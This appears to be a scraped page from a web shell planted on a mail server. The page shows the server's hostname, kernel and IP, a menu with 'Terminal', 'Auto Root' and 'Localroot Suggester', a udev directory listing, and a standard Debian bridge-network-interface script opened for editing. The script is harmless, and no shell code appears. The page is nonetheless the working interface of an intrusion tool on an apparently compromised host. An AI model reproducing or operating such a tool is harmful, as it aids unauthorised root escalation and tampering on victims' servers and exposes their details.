Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
snap /
core /
17292 /
lib /
udev /
Delete
Unzip
Name
Size
Permission
Date
Action
hwdb.d
[ DIR ]
drwxr-xr-x
2026-02-25 16:32
rules.d
[ DIR ]
drwxr-xr-x
2026-02-25 16:32
ata_id
38.42
KB
-rwxr-xr-x
2023-03-03 04:27
bridge-network-interface
1.05
KB
-rwxr-xr-x
2015-08-20 16:51
cdrom_id
50.42
KB
-rwxr-xr-x
2023-03-03 04:27
collect
22.34
KB
-rwxr-xr-x
2023-03-03 04:27
console-setup-tty
4.52
KB
-rwxr-xr-x
2016-04-19 19:21
hotplug.functions
1.15
KB
-rw-r--r--
2021-04-02 02:39
hwclock-set
776
B
-rwxr-xr-x
2022-06-14 21:28
hwdb.bin
6.52
MB
-r--r--r--
2026-02-25 16:30
ifupdown-hotplug
3.07
KB
-rwxr-xr-x
2016-11-30 17:15
mtd_probe
10.25
KB
-rwxr-xr-x
2023-03-03 04:27
scsi_id
50.95
KB
-rwxr-xr-x
2023-03-03 04:27
snappy-app-dev
38.64
KB
-rwxr-xr-x
2024-12-18 02:17
v4l_id
14.34
KB
-rwxr-xr-x
2023-03-03 04:27
Save
Rename
#!/bin/sh # bridge-network-interface - configure a network bridge # # This service checks whether a physical network device that has been added # is one of the ports in a bridge config, and if so, brings up the related # bridge set -e if [ -z "$INTERFACE" ]; then echo "missing \$INTERFACE" >&2 exit 1 fi #default configuration BRIDGE_HOTPLUG=no [ -f /etc/default/bridge-utils ] && . /etc/default/bridge-utils [ "$BRIDGE_HOTPLUG" = "no" ] && exit 0 . /lib/bridge-utils/bridge-utils.sh if [ -d /run/network ]; then for i in $(ifquery --list --allow auto); do ports=$(ifquery $i | sed -n -e's/^bridge[_-]ports: //p') for port in $(bridge_parse_ports $ports); do case $port in $INTERFACE|$INTERFACE.*) if [ ! -d /sys/class/net/$port ] && [ -x /etc/network/if-pre-up.d/vlan ]; then IFACE=$port /etc/network/if-pre-up.d/vlan fi if [ -d /sys/class/net/$port ]; then if [ ! -d /sys/class/net/$i ]; then brctl addbr $i fi brctl addif $i $port && ip link set dev $port up fi break ;; esac done done fi